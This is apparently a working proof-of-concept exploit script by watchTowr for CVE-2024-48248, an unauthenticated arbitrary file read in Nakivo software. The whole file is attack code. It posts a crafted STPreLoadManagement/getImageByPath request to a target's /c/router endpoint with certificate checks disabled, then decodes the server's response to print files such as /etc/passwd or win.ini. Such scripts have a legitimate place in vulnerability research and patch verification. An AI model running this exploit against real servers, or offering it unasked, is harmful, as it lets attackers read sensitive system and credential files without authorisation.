import requests import re import argparse import urllib3 import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) banner = """ __ ___ ___________ __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| \\/ \\/ \\/ watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py (*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr - Sonny , watchTowr (sonny@watchTowr.com) CVEs: [CVE-2024-48248] """ helptext = """ Example Usage: - python watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file C:/windows/win.ini """ print(banner) parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("--url", help="target url in the format https://192.168.1.1:4443", default=False, action="store", required=True) parser.add_argument("--file", help="target file in the format C:/windows/win.ini or /etc/passwd etc", default=False, action="store", required=True) try: args = parser.parse_args() except: print(banner) print(helptext) raise print(f"[*] Targeting {args.url}") print(f"[*] Attempting to read file '{args.file}'") req_headers = {"Content-type": "application/json", "Accept-Encoding": "gzip, deflate, br"} req_json={"action": "STPreLoadManagement", "data": [f"{args.file}"], "method": "getImageByPath", "sid": "", "tid": "watchTowr", "type": "watchTowr"} response = requests.post(args.url+"/c/router", headers=req_headers, json=req_json, verify=False) if "NoSuchFileException" in response.text: print("[!] Error NoSuchFileException") exit() parsed_json = json.loads(response.text) # Get the data array data_array = parsed_json['data'] # Convert the array of numbers to characters and join them decoded_text = ''.join(chr(num) for num in data_array) print(f"[*] File Contents:\n{decoded_text}")